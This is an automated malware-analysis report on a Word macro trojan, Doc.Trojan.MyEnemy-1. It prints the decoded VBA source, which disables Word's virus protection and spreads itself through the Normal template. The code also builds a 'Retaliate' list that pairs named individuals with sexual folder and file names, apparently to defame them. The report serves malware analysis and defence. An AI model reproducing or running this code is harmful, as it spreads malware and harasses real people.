Doc.Trojan.MyEnemy-1 Office (OLE) malware analysis — malicious · d50b8e69f5862a86

MALICIOUS

Office (OLE)

56.5 KB Created: 2003-11-20 14:02:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7af7f07317fb06d577001a935f5322b7 SHA-1: dc4b0ef3e9a6561250fa90c50750f3898a3c71c1 SHA-256: d50b8e69f5862a869fc241199e7430bed0f2461a2f84c4e895bf36c886b44dba

120 Risk Score

Malware Insights

Doc.Trojan.MyEnemy-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.MyEnemy-1. It contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon document opening. The macro code appears to be designed to obfuscate its presence and potentially download additional payloads, although the exact download URL is not directly visible in the provided script excerpt.

Heuristics 3

ClamAV: Doc.Trojan.MyEnemy-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.MyEnemy-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21540 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	21540 bytes
SHA-256: `d108440d38e30d05d6d4c5e3388b113efba6169ad01f6f685b2c260fbf61c974`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Dim acd, ntt As Object Dim MyEnemy$(20, 1) Dim MyPhoto$(10) Dim MyVideo$(6) Dim MyExten$(5) Dim zw As Byte Const mrk = "èó àèà èàåñè îòâðù îçêç îèñðâéÀ .ÂðñíïñíÔíðâêìñ îàèèï ààóÊìñàîî .Â" Private Sub CommandButton1_Click() ûðó End Sub Private Sub document_open() On Error Resume Next Options.VirusProtection = False Set acd = ActiveDocument.VBProject.VBComponents.Item(1) Set ntt = NormalTemplate.VBProject.VBComponents.Item(1) If Not acd.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then acd.CodeModule.DeleteLines 1, acd.CodeModule.CountOfLines If Not ntt.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then ntt.CodeModule.DeleteLines 1, ntt.CodeModule.CountOfLines End Sub Private Sub document_close() On Error Resume Next Options.VirusProtection = False Set acd = ActiveDocument.VBProject.VBComponents.Item(1) Set ntt = NormalTemplate.VBProject.VBComponents.Item(1) s$ = "" If (acd.CodeModule.CountOfLines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then v2 = 1 For v = 1 To ntt.CodeModule.CountOfLines s$ = ntt.CodeModule.lines(v, 1) If s$ <> "" Then acd.CodeModule.insertlines v2, s$ v2 = v2 + 1 End If Next v End If ActiveDocument.Save If ntt.CodeModule.CountOfLines <= 1 Then v2 = 1 For v = 1 To acd.CodeModule.CountOfLines s$ = acd.CodeModule.lines(v, 1) If s$ <> "" Then ntt.CodeModule.insertlines v2, s$ v2 = v2 + 1 End If Next v End If NormalTemplate.Save 'Retaliate MyEnemy$(0, 0) = "Ôðîëîâ Î. À." MyEnemy$(1, 0) = "Åìåëüÿíåíêî Â. Â." MyEnemy$(2, 0) = "Ïîäãîðíîâà Å. È." MyEnemy$(3, 0) = "Ìàòðîñîâà Îëüãà Åâãåíüåâíà" MyEnemy$(4, 0) = "Êîâàëåâà Î Þ" MyEnemy$(5, 0) = "Ìîñèí Ê. Ï." MyEnemy$(6, 0) = "Øàëûãèí Ï. Ñ." MyEnemy$(7, 0) = "Ëèõòåð Àíàòîëèé Ìèõàéëîâè÷" MyEnemy$(8, 0) = "À. Ì. Êàðïîâ" MyEnemy$(9, 0) = "Êîçëîâ Àíäðåé Àëåêñàíäðîâè÷" MyEnemy$(10, 0) = "Ïàâëîâà Îëüãà" MyEnemy$(11, 0) = "Äìèòðèåâ Ñåðãåé" MyEnemy$(12, 0) = "Bob Klein" MyEnemy$(13, 0) = "Jim Rein" MyEnemy$(14, 0) = "John A. Hopkins" MyEnemy$(15, 0) = "Garry Wood" MyEnemy$(17, 0) = "Debra Henriksen" MyEnemy$(18, 0) = "Patricia " MyEnemy$(19, 0) = "Hitler" For v = 0 To 19 If (v <= 11) Or (v = 19) Then MyEnemy$(v, 1) = "C:\Ìîè äîêóìåíòû" Else MyEnemy$(v, 1) = "C:\My documents" End If Next v MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Òðàõàíüå\" MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Ïîðíî\" MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Ñåêñ\" MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Èçâðàùåíèÿ\" MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Òðàõ\" MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Êëóáíè÷êà\" MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Äåâóøêè\Ãåëÿ\" MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Ôîòêè äåâóøåê\Êîìèññàðîâà Àíãåëèíà Âèòàëüåâíà\" MyEnemy$(8, 1) = "C:\Òîëüêî äëÿ ìåíÿ\Ïîðíóõà\Ãåëêà\" MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Îáíàæåííàÿ íàòóðà\Àíãåëèíà\" MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Ñåêñ_êîëëåêöèÿ\Êîìèññàðîâà_À_Â\" MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Ëó÷øèå ïîïêè ãîðîäà\" MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\" MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\" MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka" MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\" MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\" MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\" MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\" MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Âûñòàâêà ñåêñà\Ðîññèÿ\Àñòðàõàíü\" MyPhoto$(0) = "Angelina" MyPhoto$(1) = "Gela" MyPhoto$(2) = "Body_A" MyPhoto$(3) = "Fuck" MyPhoto$(4) = "Fuck_ass" MyPhoto$(5) = "Ass" MyPhoto$(6) = "Cnt" MyPhoto$(7) = "Klzm" MyPhoto$(8) = "Kk" MyPhoto$(9) = "Urn" MyVideo$(0) = "Gela&Seryj" My ... (truncated)

SHA-256: d108440d38e30d05d6d4c5e3388b113efba6169ad01f6f685b2c260fbf61c974

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim acd, ntt As Object
Dim MyEnemy$(20, 1)
Dim MyPhoto$(10)
Dim MyVideo$(6)
Dim MyExten$(5)
Dim zw As Byte
Const mrk = "èó àèà èàåñè îòâðù îçêç îèñðâéÀ .ÂðñíïñíÔíðâêìñ îàèèï ààóÊìñàîî .Â"
Private Sub CommandButton1_Click()
ûðó
End Sub
Private Sub document_open()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 If Not acd.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then acd.CodeModule.DeleteLines 1, acd.CodeModule.CountOfLines
 If Not ntt.CodeModule.Find(mrk, 1, 1, 1000, 1000) Then ntt.CodeModule.DeleteLines 1, ntt.CodeModule.CountOfLines
End Sub
Private Sub document_close()
 On Error Resume Next
 Options.VirusProtection = False
 Set acd = ActiveDocument.VBProject.VBComponents.Item(1)
 Set ntt = NormalTemplate.VBProject.VBComponents.Item(1)
 s$ = ""
 If (acd.CodeModule.CountOfLines <= 1) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
  v2 = 1
  For v = 1 To ntt.CodeModule.CountOfLines
   s$ = ntt.CodeModule.lines(v, 1)
   If s$ <> "" Then
    acd.CodeModule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 ActiveDocument.Save
 If ntt.CodeModule.CountOfLines <= 1 Then
  v2 = 1
  For v = 1 To acd.CodeModule.CountOfLines
   s$ = acd.CodeModule.lines(v, 1)
   If s$ <> "" Then
    ntt.CodeModule.insertlines v2, s$
    v2 = v2 + 1
   End If
  Next v
 End If
 NormalTemplate.Save
 'Retaliate
 MyEnemy$(0, 0) = "Ôðîëîâ Î. À."
 MyEnemy$(1, 0) = "Åìåëüÿíåíêî Â. Â."
 MyEnemy$(2, 0) = "Ïîäãîðíîâà Å. È."
 MyEnemy$(3, 0) = "Ìàòðîñîâà Îëüãà Åâãåíüåâíà"
 MyEnemy$(4, 0) = "Êîâàëåâà Î Þ"
 MyEnemy$(5, 0) = "Ìîñèí Ê. Ï."
 MyEnemy$(6, 0) = "Øàëûãèí Ï. Ñ."
 MyEnemy$(7, 0) = "Ëèõòåð Àíàòîëèé Ìèõàéëîâè÷"
 MyEnemy$(8, 0) = "À. Ì. Êàðïîâ"
 MyEnemy$(9, 0) = "Êîçëîâ Àíäðåé Àëåêñàíäðîâè÷"
 MyEnemy$(10, 0) = "Ïàâëîâà Îëüãà"
 MyEnemy$(11, 0) = "Äìèòðèåâ Ñåðãåé"
 MyEnemy$(12, 0) = "Bob Klein"
 MyEnemy$(13, 0) = "Jim Rein"
 MyEnemy$(14, 0) = "John A. Hopkins"
 MyEnemy$(15, 0) = "Garry Wood"
 MyEnemy$(17, 0) = "Debra Henriksen"
 MyEnemy$(18, 0) = "Patricia "
 MyEnemy$(19, 0) = "Hitler"
 
 For v = 0 To 19
  If (v <= 11) Or (v = 19) Then
   MyEnemy$(v, 1) = "C:\Ìîè äîêóìåíòû"
  Else
   MyEnemy$(v, 1) = "C:\My documents"
  End If
 Next v
 MyEnemy$(0, 1) = MyEnemy$(0, 1) + "\Òðàõàíüå\"
 MyEnemy$(1, 1) = MyEnemy$(1, 1) + "\Ïîðíî\"
 MyEnemy$(2, 1) = MyEnemy$(2, 1) + "\Ñåêñ\"
 MyEnemy$(3, 1) = MyEnemy$(3, 1) + "\Èçâðàùåíèÿ\"
 MyEnemy$(4, 1) = MyEnemy$(4, 1) + "\Òðàõ\"
 MyEnemy$(5, 1) = MyEnemy$(5, 1) + "\Êëóáíè÷êà\"
 MyEnemy$(6, 1) = MyEnemy$(6, 1) + "\Äåâóøêè\Ãåëÿ\"
 MyEnemy$(7, 1) = MyEnemy$(7, 1) + "\Ôîòêè äåâóøåê\Êîìèññàðîâà Àíãåëèíà Âèòàëüåâíà\"
 MyEnemy$(8, 1) = "C:\Òîëüêî äëÿ ìåíÿ\Ïîðíóõà\Ãåëêà\"
 MyEnemy$(9, 1) = MyEnemy$(9, 1) + "\Îáíàæåííàÿ íàòóðà\Àíãåëèíà\"
 MyEnemy$(10, 1) = MyEnemy$(10, 1) + "\Ñåêñ_êîëëåêöèÿ\Êîìèññàðîâà_À_Â\"
 MyEnemy$(11, 1) = MyEnemy$(11, 1) + "\Ëó÷øèå ïîïêè ãîðîäà\"
 MyEnemy$(12, 1) = MyEnemy$(12, 1) + "\Russian Porno\"
 MyEnemy$(13, 1) = MyEnemy$(13, 1) + "\Russian Girls\Comissarova\"
 MyEnemy$(14, 1) = MyEnemy$(14, 1) + "\Russian Fuck\Gelka"
 MyEnemy$(15, 1) = MyEnemy$(15, 1) + "\Nudo\G\"
 MyEnemy$(16, 1) = MyEnemy$(16, 1) + "\Sex Show 1\Gela\"
 MyEnemy$(17, 1) = MyEnemy$(17, 1) + "\Sex Collection\"
 MyEnemy$(18, 1) = MyEnemy$(18, 1) + "\Crazy Sex\"
 MyEnemy$(19, 1) = MyEnemy$(19, 1) + "\Âûñòàâêà ñåêñà\Ðîññèÿ\Àñòðàõàíü\"
 
 MyPhoto$(0) = "Angelina"
 MyPhoto$(1) = "Gela"
 MyPhoto$(2) = "Body_A"
 MyPhoto$(3) = "Fuck"
 MyPhoto$(4) = "Fuck_ass"
 MyPhoto$(5) = "Ass"
 MyPhoto$(6) = "Cnt"
 MyPhoto$(7) = "Klzm"
 MyPhoto$(8) = "Kk"
 MyPhoto$(9) = "Urn"
 
 MyVideo$(0) = "Gela&Seryj"
 My
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.